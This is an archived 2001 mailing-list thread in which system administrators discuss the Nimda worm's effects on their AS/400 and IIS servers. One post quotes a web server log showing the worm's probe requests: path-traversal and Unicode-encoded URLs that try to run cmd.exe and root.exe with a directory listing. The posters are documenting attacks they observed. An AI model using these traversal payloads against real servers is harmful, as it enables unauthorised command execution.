|
This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. -- [ Picked text/plain from multipart/alternative ] We also saw an increase in traffic. No impact on our extranet site. Now for our PCS systems that use IIS for presentation and our SMTP gateway (which inadvertently had IIS running) it's a different story. Good news is, it didn't affect my job. Well unless you count the three days we couldn't use our Exchange SMTP gateway and didn't have outside mail......... Michael Crump Saint-Gobain Containers 1509 S. Macedonia Ave. Muncie, IN 47302 (765)741-7696 (765)741-7012 f (800)428-8642 mailto:mike.crump@saint-gobain.com "Joel R. Cochran" <jrc@masi-brac.com> 10/04/01 02:51 PM Please respond to midrange-l To: midrange-l@midrange.com cc: Subject: RE: NIMDA Virus - Anyone been affected by it ? Ditto, increased our traffic by 300%. Mind you it didn't phase our machine or appear to have any effect on our users, but I couldn't figure out how to prevent it. Thank goodness for the good old HTTP Server. For those who aren't sure what we are referring to, here is a snippet from the HTTP log file. We were all sitting around the office laughing at these stupid Windows requests on a 400... "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 232 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 232 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 232 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 232 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 This went on for over a week from literally hundreds of IP addresses. Our ISP had no idea what to do, so we just let it run it's course. You'll notice, of course, that the response code on each one of these is 404, so they never hurt anything. Joel R. Cochran Director of Internet Services VamaNet.com 800-480-8810 (va toll free) 540-885-8050 (phone) 540-886-1589 (fax) www.vamanet.com mailto:custservice@vamanet.com >-----Original Message----- >From: Larryt222@aol.com [mailto:Larryt222@aol.com] >Sent: Thursday, October 04, 2001 3:09 PM >To: midrange-l@midrange.com >Subject: Re: NIMDA Virus - Anyone been affected by it ? > > >Why NIMDA did nothing to our 400, the site was hit an average >of 8,000 times a day which caused our stores to get slower >response because of all the trafic on the line. NIMDA was >trying to execute NT code which as you know does not execute >on the 400. It appears that once they have an IP address NIMDA >keeps on trying to contact that IP. > >Larry T. >_______________________________________________ >This is the Midrange Systems Technical Discussion (MIDRANGE-L) >mailing list >To post a message email: MIDRANGE-L@midrange.com >To subscribe, unsubscribe, or change list options, >visit: http://lists.midrange.com/cgi-bin/listinfo/midrange-l >or email: MIDRANGE-L-request@midrange.com >Before posting, please take a moment to review the archives >at http://archive.midrange.com/midrange-l. > _______________________________________________ This is the Midrange Systems Technical Discussion (MIDRANGE-L) mailing list To post a message email: MIDRANGE-L@midrange.com To subscribe, unsubscribe, or change list options, visit: http://lists.midrange.com/cgi-bin/listinfo/midrange-l or email: MIDRANGE-L-request@midrange.com Before posting, please take a moment to review the archives at http://archive.midrange.com/midrange-l.
As an Amazon Associate we earn from qualifying purchases.
This mailing list archive is Copyright 1997-2024 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].
Operating expenses for this site are earned using the Amazon Associate program and Google Adsense.